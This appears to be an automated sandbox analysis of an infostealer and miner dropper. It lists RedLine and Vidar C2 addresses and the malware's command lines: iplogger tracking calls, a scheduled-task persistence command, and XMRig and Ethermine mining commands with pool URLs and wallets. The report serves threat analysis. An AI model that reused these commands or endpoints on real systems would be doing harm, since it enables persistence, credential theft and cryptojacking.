Analysis

  • max time kernel
    150s
  • max time network
    155s
  • platform
    windows7_x64
  • resource
    win7-20220715-en
  • resource tags

    arch:x64arch:x86image:win7-20220715-enlocale:en-usos:windows7-x64system
  • submitted
    17-07-2022 08:41

General

  • Target

    67b7a8d8395ae6f46b97b47351adcc8d.exe

  • Size

    7.3MB

  • MD5

    67b7a8d8395ae6f46b97b47351adcc8d

  • SHA1

    c7c304b9d99b87ccc21e39ae5cc8a1d8d858fb1f

  • SHA256

    071b6a97e9931097875ebcb7e58d0248ceba48243ce7caa29316b4f4198c7a1f

  • SHA512

    07825cbe9d3d1a68135eb7d15a2bce1bdd9af39bab7acd4693aa4d1a505341c4f97647317f43abf294347c139ffbe8c991f04a46ac33f9419546dd9036c125c0

Malware Config

Extracted

Family

redline

Botnet

4

C2

31.41.244.134:11643

Attributes
  • auth_value

    a516b2d034ecd34338f12b50347fbd92

Extracted

Family

redline

Botnet

5239890474

C2

193.106.191.253:4752

Attributes
  • auth_value

    4b35bc435fa5324557f24ea122bfff2b

Extracted

Family

redline

Botnet

nam3

C2

103.89.90.61:18728

Attributes
  • auth_value

    64b900120bbceaa6a9c60e9079492895

Extracted

Family

redline

Botnet

@willilawilwilililw

C2

194.36.177.77:23795

Attributes
  • auth_value

    0aa68e6e6d95c1bd9c9549ad5700d4a0

Extracted

Family

vidar

Version

53.2

Botnet

1521

C2

https://t.me/tgch_hijuly

https://c.im/@olegf9844h

Attributes
  • profile_id

    1521

Extracted

Family

redline

Botnet

@latrant100

C2

65.108.20.182:45391

Attributes
  • auth_value

    15c4c331c46a3545f929699f60d0af0f

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 20 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Vidar Stealer 3 IoCs
  • XMRig Miner payload 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 11 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 11 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Drops file in Program Files directory 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SetWindowsHookEx 34 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\67b7a8d8395ae6f46b97b47351adcc8d.exe
    "C:\Users\Admin\AppData\Local\Temp\67b7a8d8395ae6f46b97b47351adcc8d.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:1524
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1AzFK4
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      PID:1736
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1736 CREDAT:275457 /prefetch:2
        3⤵
        • Suspicious use of SetWindowsHookEx
        PID:2164
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1n7LH4
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      PID:1188
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1188 CREDAT:275457 /prefetch:2
        3⤵
        • Suspicious use of SetWindowsHookEx
        PID:2112
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1AmFK4
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      PID:900
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:900 CREDAT:275457 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:2120
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1RXtX4
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      PID:1860
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1860 CREDAT:275457 /prefetch:2
        3⤵
        • Suspicious use of SetWindowsHookEx
        PID:2064
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1RCgX4
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      PID:956
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:956 CREDAT:275457 /prefetch:2
        3⤵
        • Suspicious use of SetWindowsHookEx
        PID:2148
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1RLtX4
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      PID:1304
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1304 CREDAT:275457 /prefetch:2
        3⤵
        • Suspicious use of SetWindowsHookEx
        PID:2072
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1A4aK4
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      PID:1984
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1984 CREDAT:275457 /prefetch:2
        3⤵
        • Suspicious use of SetWindowsHookEx
        PID:2132
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1RsdX4
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:744
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:744 CREDAT:275457 /prefetch:2
        3⤵
        • Suspicious use of SetWindowsHookEx
        PID:1652
    • C:\Program Files (x86)\Company\NewProduct\safert44.exe
      "C:\Program Files (x86)\Company\NewProduct\safert44.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:960
    • C:\Program Files (x86)\Company\NewProduct\tag12312341.exe
      "C:\Program Files (x86)\Company\NewProduct\tag12312341.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1828
    • C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe
      "C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1496
    • C:\Program Files (x86)\Company\NewProduct\willilawilwilililw.exe
      "C:\Program Files (x86)\Company\NewProduct\willilawilwilililw.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1472
      • C:\Users\Admin\AppData\Local\Temp\samagon.exe
        "C:\Users\Admin\AppData\Local\Temp\samagon.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:3808
        • C:\Windows\system32\cmd.exe
          cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpEAEC.tmp.bat""
          4⤵
            PID:3940
            • C:\Windows\system32\timeout.exe
              timeout 3
              5⤵
              • Delays execution with timeout.exe
              PID:3980
            • C:\ProgramData\pol\IYWKXPO.exe
              "C:\ProgramData\pol\IYWKXPO.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4000
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /rl highest /tn "IYWKXPO" /tr '"C:\ProgramData\pol\IYWKXPO.exe"' & exit
                6⤵
                  PID:4064
                  • C:\Windows\system32\schtasks.exe
                    schtasks /create /f /sc MINUTE /mo 3 /rl highest /tn "IYWKXPO" /tr '"C:\ProgramData\pol\IYWKXPO.exe"'
                    7⤵
                    • Creates scheduled task(s)
                    PID:4092
                • C:\ProgramData\pol\xmr.exe
                  "C:\ProgramData\pol\xmr.exe" /c C:\ProgramData//pol//xmr.exe -a cryptonight-heavy --url=pool.hashvault.pro:5555 -u 49xdBXJTnHHJHTfFJX9gNc1vSf8ujQbWUKE4b7JC3iV2i489oEAZ2ZmWNGxGDNYKNcBMifWs6mQmRjnmVrpVNwMw7ZDDFf5 -R --variant=-1 --max-cpu-usage=75 --donate-level=1 -opencl
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  PID:3252
                • C:\ProgramData\pol\etc.exe
                  "C:\ProgramData\pol\etc.exe" -pool ssl://eu1-etc.ethermine.org:5555 -wal 0x3feE2228A2c699C7c9fc5719BC409dc0D3073d48.Rig001 -coin etc -log 0
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  PID:3544
        • C:\Program Files (x86)\Company\NewProduct\me.exe
          "C:\Program Files (x86)\Company\NewProduct\me.exe"
          2⤵
          • Executes dropped EXE
          PID:1956
        • C:\Program Files (x86)\Company\NewProduct\F0geI.exe
          "C:\Program Files (x86)\Company\NewProduct\F0geI.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          PID:1528
        • C:\Program Files (x86)\Company\NewProduct\hashcats.exe
          "C:\Program Files (x86)\Company\NewProduct\hashcats.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1608

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Execution

      Scheduled Task

      1
      T1053

      Persistence

      Scheduled Task

      1
      T1053

      Privilege Escalation

      Scheduled Task

      1
      T1053

      Defense Evasion

      Modify Registry

      1
      T1112

      Credential Access

      Credentials in Files

      2
      T1081

      Discovery

      Query Registry

      1
      T1012

      System Information Discovery

      1
      T1082

      Collection

      Data from Local System

      2
      T1005

      Command and Control

      Web Service

      1
      T1102

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Program Files (x86)\Company\NewProduct\F0geI.exe
        Filesize

        7.0MB

        MD5

        174085ba0f578dd66c6e578c8b0958a7

        SHA1

        43afd68216f80ce1191ea04529e71cf0638003c4

        SHA256

        0b07732ad94780abf2ba694b0b5adb033a4ecd515e3367d68be2656fbcbbd1ee

        SHA512

        14792b0e1eb1c2adc111e18ea913c0ac1c1a846470782f28da3a7be96d6a5a312770795529f7040dde7e044ceb24de506c960d614641d16583bd767723aacba1

      • C:\Program Files (x86)\Company\NewProduct\F0geI.exe
        Filesize

        7.0MB

        MD5

        174085ba0f578dd66c6e578c8b0958a7

        SHA1

        43afd68216f80ce1191ea04529e71cf0638003c4

        SHA256

        0b07732ad94780abf2ba694b0b5adb033a4ecd515e3367d68be2656fbcbbd1ee

        SHA512

        14792b0e1eb1c2adc111e18ea913c0ac1c1a846470782f28da3a7be96d6a5a312770795529f7040dde7e044ceb24de506c960d614641d16583bd767723aacba1

      • C:\Program Files (x86)\Company\NewProduct\hashcats.exe
        Filesize

        244KB

        MD5

        ff6e08c7b6288bca84b12a691d9e8790

        SHA1

        ecbfad28e1603d9eb77b2ed65778d59ed5cbb5bd

        SHA256

        286fdd669cd0130ff810c4748fa287f1c3511a2c083f9d3fd6ea6694e3f71ada

        SHA512

        62d76ff0d52b6d322ffe750dcdf7a6a94a69411e5fa73ceae3f5d497c174eda2faf889cc35986f0131ac4332f73616d2c23775b53f50a2df11e976b8b3a582e2

      • C:\Program Files (x86)\Company\NewProduct\hashcats.exe
        Filesize

        244KB

        MD5

        ff6e08c7b6288bca84b12a691d9e8790

        SHA1

        ecbfad28e1603d9eb77b2ed65778d59ed5cbb5bd

        SHA256

        286fdd669cd0130ff810c4748fa287f1c3511a2c083f9d3fd6ea6694e3f71ada

        SHA512

        62d76ff0d52b6d322ffe750dcdf7a6a94a69411e5fa73ceae3f5d497c174eda2faf889cc35986f0131ac4332f73616d2c23775b53f50a2df11e976b8b3a582e2

      • C:\Program Files (x86)\Company\NewProduct\me.exe
        Filesize

        289KB

        MD5

        1c81ed505827450694e954cebc6c5c76

        SHA1

        2a43107f95f0c2f53b02c560fa9cc1c5332d57c8

        SHA256

        778ebfc8fbfb986a8734f77b61ea7ea5d89b8d70849e09b83571ec0bac908050

        SHA512

        9a3ab44dcc38c73d40c8b4bf1e6073a362f12d689daa854b131f298c0a617191bf6a11a4869084cf5465a153d90169f5df82b7bc2b1806091d4887c313b429ab

      • C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe
        Filesize

        245KB

        MD5

        b16134159e66a72fb36d93bc703b4188

        SHA1

        e869e91a2b0f77e7ac817e0b30a9a23d537b3001

        SHA256

        b064af166491cb307cfcb9ce53c09696d9d3f6bfa65dfc60b237c275be9b655c

        SHA512

        3fdf205ca16de89c7ed382ed42f628e1211f3e5aff5bf7dedc47927f3dd7ff54b0dd10b4e8282b9693f45a5ee7a26234f899d14bfd8eb0fd078b42a4ed8b8b4c

      • C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe
        Filesize

        245KB

        MD5

        b16134159e66a72fb36d93bc703b4188

        SHA1

        e869e91a2b0f77e7ac817e0b30a9a23d537b3001

        SHA256

        b064af166491cb307cfcb9ce53c09696d9d3f6bfa65dfc60b237c275be9b655c

        SHA512

        3fdf205ca16de89c7ed382ed42f628e1211f3e5aff5bf7dedc47927f3dd7ff54b0dd10b4e8282b9693f45a5ee7a26234f899d14bfd8eb0fd078b42a4ed8b8b4c

      • C:\Program Files (x86)\Company\NewProduct\safert44.exe
        Filesize

        244KB

        MD5

        dbe947674ea388b565ae135a09cc6638

        SHA1

        ae8e1c69bd1035a92b7e06baad5e387de3a70572

        SHA256

        86aeac2a4ee8e62265ee570718bbd41a4e643e0bad69e7b4fa6c24baeb220709

        SHA512

        67441aebbf7ce4d53fbb665124f309faed7842b3e424e018454ff6d6f790219633ce6a9b370aeaf77c5092e84f4391df13e964ca6a28597810dee41c3c833893

      • C:\Program Files (x86)\Company\NewProduct\safert44.exe
        Filesize

        244KB

        MD5

        dbe947674ea388b565ae135a09cc6638

        SHA1

        ae8e1c69bd1035a92b7e06baad5e387de3a70572

        SHA256

        86aeac2a4ee8e62265ee570718bbd41a4e643e0bad69e7b4fa6c24baeb220709

        SHA512

        67441aebbf7ce4d53fbb665124f309faed7842b3e424e018454ff6d6f790219633ce6a9b370aeaf77c5092e84f4391df13e964ca6a28597810dee41c3c833893

      • C:\Program Files (x86)\Company\NewProduct\tag12312341.exe
        Filesize

        107KB

        MD5

        79fdcf857590d4f59c00b6eb98546a50

        SHA1

        7bf3cc1ae2b249c555d0a2f0d2b6598684f2119a

        SHA256

        ed735079b2235ea53394cf15f60362f56fdba508ee1fb163972cf966567c1a21

        SHA512

        767b53ad1889e47f3053d306573b3e1ff87a7a68e44ce0e004a1c80a883b6aa319a1ea128989f9490244affe2e04b3f0865372c7e9eade36f52b37bb084e0013

      • C:\Program Files (x86)\Company\NewProduct\tag12312341.exe
        Filesize

        107KB

        MD5

        79fdcf857590d4f59c00b6eb98546a50

        SHA1

        7bf3cc1ae2b249c555d0a2f0d2b6598684f2119a

        SHA256

        ed735079b2235ea53394cf15f60362f56fdba508ee1fb163972cf966567c1a21

        SHA512

        767b53ad1889e47f3053d306573b3e1ff87a7a68e44ce0e004a1c80a883b6aa319a1ea128989f9490244affe2e04b3f0865372c7e9eade36f52b37bb084e0013

      • C:\Program Files (x86)\Company\NewProduct\willilawilwilililw.exe
        Filesize

        107KB

        MD5

        2f59b9e75115022399c9f1e6c1ac1649

        SHA1

        058b4934b0062208189467c56ded9084af711d79

        SHA256

        09da5a6638115a67d73b3641c648e924defcc731b8612481652953e72f9674ab

        SHA512

        60996c19a7a6c9c7755974305244ae71dd72fc6f591b587847c0ae874723b9b2997b8f022c7ab165031692036abb10a2404bfe2012deab817c8092bad977cd6d

      • C:\Program Files (x86)\Company\NewProduct\willilawilwilililw.exe
        Filesize

        107KB

        MD5

        2f59b9e75115022399c9f1e6c1ac1649

        SHA1

        058b4934b0062208189467c56ded9084af711d79

        SHA256

        09da5a6638115a67d73b3641c648e924defcc731b8612481652953e72f9674ab

        SHA512

        60996c19a7a6c9c7755974305244ae71dd72fc6f591b587847c0ae874723b9b2997b8f022c7ab165031692036abb10a2404bfe2012deab817c8092bad977cd6d

      • C:\ProgramData\pol\IYWKXPO.exe
        Filesize

        837KB

        MD5

        82d79c7429d68e9a0c7f6e6051333883

        SHA1

        2a2be7a4744f9ac1405b483dd6e586eb85d3a6e5

        SHA256

        fce13579ece5e9a9bd4c343f917b4456ff15b9a5a31e39106c1e8a146dfdde54

        SHA512

        6cb279cbdec4d5e360c66bccaf26983bbe4c5c030cf37201f90f18a192414373e933799ee127a2c07da896a899b294d6ef2be29cf169981c85a979d0614a2fb7

      • C:\ProgramData\pol\IYWKXPO.exe
        Filesize

        837KB

        MD5

        82d79c7429d68e9a0c7f6e6051333883

        SHA1

        2a2be7a4744f9ac1405b483dd6e586eb85d3a6e5

        SHA256

        fce13579ece5e9a9bd4c343f917b4456ff15b9a5a31e39106c1e8a146dfdde54

        SHA512

        6cb279cbdec4d5e360c66bccaf26983bbe4c5c030cf37201f90f18a192414373e933799ee127a2c07da896a899b294d6ef2be29cf169981c85a979d0614a2fb7

      • C:\ProgramData\pol\etc.exe
        Filesize

        4.6MB

        MD5

        f5f6cfc1d9e8d3b2be6e8aaf6089a27b

        SHA1

        1570c5d903c1032f9cd84458491d7cc7f380d306

        SHA256

        c7e1aa53dc667581f37bcbd0793c2ef909e8a4461c59641cb2c672ebe192609c

        SHA512

        8246df55014d53b0c777d9d14fda156dff2d14183451e1b448e27d514585bf9be40ee063f65074facc0c8850d565242950ccb329baecd21d83b6e47449b7f8ca

      • C:\ProgramData\pol\xmr.exe
        Filesize

        5.1MB

        MD5

        7449de937593cb2d60b2d9022908ec69

        SHA1

        16f658bfa5ef91be13326d3000f905c84d525085

        SHA256

        56242edc2a39b6ae24e5c6defec47be2c99a69e73a96128dd02d4f0222509260

        SHA512

        e8f31c5669aa1529e1ef5729a0a793ec7aa1ccd9fe8d51ed6ba3575d716b7d2d8b3168890a9530c24a2bbee5f9e706839d5a4a0c8fa0dff4757d981e67da5968

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        340B

        MD5

        0e0aecb86d20d96629552d5d1e3e583a

        SHA1

        09a534b674e26426e6d6e28c88f0919e1d84f136

        SHA256

        d8210b1ef85d1b7aaf65a321a3d5c30345cd19ec9f6efdc96cae0ed13531e802

        SHA512

        fa10504d849dc55b6edaef5605060e1ff73d3c7b63ba2111ba29ad06b43082bac3da640cdcc57bfc22caaaeb77b3022e626a72d53105df141ad260d6bdf71ebd

      • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{F9F85F21-05BC-11ED-B71F-CAFCD9EA70F9}.dat
        Filesize

        5KB

        MD5

        81930427eb2300587118d896682d8992

        SHA1

        3967ed8a6177abc6e0a2cd018cbd953817be922f

        SHA256

        409b2c2d57d7dc6a77b548723632a91cd6655defc509537dbc8ce979272fd865

        SHA512

        edd4e270597f618fb17bd509a1ae835bae505939d6ceffd36db347e2507300c3004bfb1facfca697feee643e1e0960c2c4229e6f49d1d9f551d9320668f14c05

      • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{F9F88631-05BC-11ED-B71F-CAFCD9EA70F9}.dat
        Filesize

        3KB

        MD5

        99a79722e1b547195672bbcb2f9a9c38

        SHA1

        d289f90217cd1404b05e0db08687205b8854f04f

        SHA256

        73aea7e11e8b74c52b37150eb38be642fa4182f9c7b084d91496b79f4a2dfae0

        SHA512

        aa010b7eebf58871806f6c6f990192ce8b12557c3f8fafbe10c3d78e505aaa2c1b66fdca03e13edcbdcfa8bd942455cf7c99df74fa744e0640f1d327443ebe1a

      • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{F9F8AD41-05BC-11ED-B71F-CAFCD9EA70F9}.dat
        Filesize

        3KB

        MD5

        0875433950201698d33158114d0c84dd

        SHA1

        e16e362f9a9829d1620c7f4a4c9370c8474b16c0

        SHA256

        7faf2bdbb765adb0e11b724924203a86ff23f2fc5b1366aec2cb251ef29b9610

        SHA512

        54379e2cbfd3d884b17b10faf53dc1eec723ba3ff8594b1764bc09509b6fff2a16b7dfac690fef844f8832057f46e262d9eab3eb95c2499b8d31fa295ac9b7d2

      • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{F9FAC081-05BC-11ED-B71F-CAFCD9EA70F9}.dat
        Filesize

        5KB

        MD5

        de85b9a447bc5d1d8d25e1634feae008

        SHA1

        264ffa0975059c54b749194d2fd51e0c81bf3983

        SHA256

        73429aab6b5eabeb5a83344e452e386e5c373dd27377cc0157a329fc73c41bed

        SHA512

        3337899118de160aded716e66b7eaaf907e6aed445bbc3832e2b1daa08be4ff88cbf8f4389ccc208563778089177287273330dfd54391494dc3222ae39e5c20e

      • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{F9FD21E1-05BC-11ED-B71F-CAFCD9EA70F9}.dat
        Filesize

        5KB

        MD5

        f57d6a57c043b3b990230d3723576cee

        SHA1

        0369e41b20037fe659df8295175746a81ce5453f

        SHA256

        9a1e4da5d97a3b4a2d1ea6df7e32c640df4e87df9dc0a3731522e53cd2c3e97e

        SHA512

        b3e9bf719ebc58c98648f0ed0d6180578735b87ff85e07489556cac7078139fa5166efc45f959d436247515ac3ff0cb454077fdd1b7853c55de2732ce2d28d4a

      • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{F9FD48F1-05BC-11ED-B71F-CAFCD9EA70F9}.dat
        Filesize

        5KB

        MD5

        4eb8034f0a6c6e5ca73b43fe5a00d648

        SHA1

        1a42b293c7faee37af3cb06f5c8c0f65570184b3

        SHA256

        2aa8684bb885dfba1a0ed1d99b2de3945f080d3f608c30c50f2c07552261f213

        SHA512

        0b5f3d8259bb3e0da9b512f5ce576bc728a946b0b3a276271a1aceab732842b24da3d8813e11859b4b313100aa2106a9a7ca74110088c6869301db5000d9dda2

      • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{F9FF8341-05BC-11ED-B71F-CAFCD9EA70F9}.dat
        Filesize

        5KB

        MD5

        967b29ed275c1bc7e85030aa619f51fe

        SHA1

        bbb8daeb00a560dfab3847cb36e2d8305aeadf9c

        SHA256

        f61eac57999a9c6d2f1f6cd760f81a2386a7fc540f8fb7a7bb46cdbf246d0648

        SHA512

        8882f28757177c4e7b2122a3cf55befa8731bd53103171b231c2d7d72979f315a09c1a2c1feceab057a0b6c8b7eef64401f31aa361f61fa29aa4916905c9bcab

      • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{FA01E4A1-05BC-11ED-B71F-CAFCD9EA70F9}.dat
        Filesize

        5KB

        MD5

        a3ea06979070892617ba1e9e4b8875dc

        SHA1

        08fba242fb2fea1d1b9f69c59052fbfe0f0a37e5

        SHA256

        f45778d53ae2c30c3df4ea74f6a372dd14d7f3d612c33367eab250eef225e78e

        SHA512

        bad5a8619f6cfb2599ca07896ac9b0794e7c8aada89a87ff1eb27eb681cd8d81ddd9e44a08ac717b23556b97d633808b19f9e5310efef3430c171ab9ca009ac8

      • C:\Users\Admin\AppData\Local\Temp\samagon.exe
        Filesize

        837KB

        MD5

        82d79c7429d68e9a0c7f6e6051333883

        SHA1

        2a2be7a4744f9ac1405b483dd6e586eb85d3a6e5

        SHA256

        fce13579ece5e9a9bd4c343f917b4456ff15b9a5a31e39106c1e8a146dfdde54

        SHA512

        6cb279cbdec4d5e360c66bccaf26983bbe4c5c030cf37201f90f18a192414373e933799ee127a2c07da896a899b294d6ef2be29cf169981c85a979d0614a2fb7

      • C:\Users\Admin\AppData\Local\Temp\samagon.exe
        Filesize

        837KB

        MD5

        82d79c7429d68e9a0c7f6e6051333883

        SHA1

        2a2be7a4744f9ac1405b483dd6e586eb85d3a6e5

        SHA256

        fce13579ece5e9a9bd4c343f917b4456ff15b9a5a31e39106c1e8a146dfdde54

        SHA512

        6cb279cbdec4d5e360c66bccaf26983bbe4c5c030cf37201f90f18a192414373e933799ee127a2c07da896a899b294d6ef2be29cf169981c85a979d0614a2fb7

      • C:\Users\Admin\AppData\Local\Temp\tmpEAEC.tmp.bat
        Filesize

        139B

        MD5

        c0a1fbb6ef5aa3d05de631e8c8049880

        SHA1

        0d889fc5050121a9f073b1034f94e6d07579f415

        SHA256

        84483521f4d3ce2387e34f0552187b88e3c6fbffd263401d3eb06e84058e5d55

        SHA512

        3fbbb721483e6f640632f8ab3ba26782da8bf01d46943d8ca09a0e02e1745e92245943726c10bd7a6e95e90851c9a5ef31be85f7f30f55ee5c3b6ff2a661355f

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\IDKUXVY6.txt
        Filesize

        606B

        MD5

        93ffefe1718b0c77576c0e1841d3a3e4

        SHA1

        6e7c9951a4083d159dac9cb094c130ca5e287a9c

        SHA256

        912e3dd947800f375e64a943303a257edfe7cb504c87d36c23d1280f4d6d327a

        SHA512

        d4683314b3a1ba89674c0dd959ddf91e6e08bd453e48264193ff3a8941d19630709a5409c389c7d48b76ab3810ae32cf0937add2885e1895bccd8b4ce9f5d627

      • \Program Files (x86)\Company\NewProduct\F0geI.exe
        Filesize

        7.0MB

        MD5

        174085ba0f578dd66c6e578c8b0958a7

        SHA1

        43afd68216f80ce1191ea04529e71cf0638003c4

        SHA256

        0b07732ad94780abf2ba694b0b5adb033a4ecd515e3367d68be2656fbcbbd1ee

        SHA512

        14792b0e1eb1c2adc111e18ea913c0ac1c1a846470782f28da3a7be96d6a5a312770795529f7040dde7e044ceb24de506c960d614641d16583bd767723aacba1

      • \Program Files (x86)\Company\NewProduct\hashcats.exe
        Filesize

        244KB

        MD5

        ff6e08c7b6288bca84b12a691d9e8790

        SHA1

        ecbfad28e1603d9eb77b2ed65778d59ed5cbb5bd

        SHA256

        286fdd669cd0130ff810c4748fa287f1c3511a2c083f9d3fd6ea6694e3f71ada

        SHA512

        62d76ff0d52b6d322ffe750dcdf7a6a94a69411e5fa73ceae3f5d497c174eda2faf889cc35986f0131ac4332f73616d2c23775b53f50a2df11e976b8b3a582e2

      • \Program Files (x86)\Company\NewProduct\me.exe
        Filesize

        289KB

        MD5

        1c81ed505827450694e954cebc6c5c76

        SHA1

        2a43107f95f0c2f53b02c560fa9cc1c5332d57c8

        SHA256

        778ebfc8fbfb986a8734f77b61ea7ea5d89b8d70849e09b83571ec0bac908050

        SHA512

        9a3ab44dcc38c73d40c8b4bf1e6073a362f12d689daa854b131f298c0a617191bf6a11a4869084cf5465a153d90169f5df82b7bc2b1806091d4887c313b429ab

      • \Program Files (x86)\Company\NewProduct\me.exe
        Filesize

        289KB

        MD5

        1c81ed505827450694e954cebc6c5c76

        SHA1

        2a43107f95f0c2f53b02c560fa9cc1c5332d57c8

        SHA256

        778ebfc8fbfb986a8734f77b61ea7ea5d89b8d70849e09b83571ec0bac908050

        SHA512

        9a3ab44dcc38c73d40c8b4bf1e6073a362f12d689daa854b131f298c0a617191bf6a11a4869084cf5465a153d90169f5df82b7bc2b1806091d4887c313b429ab

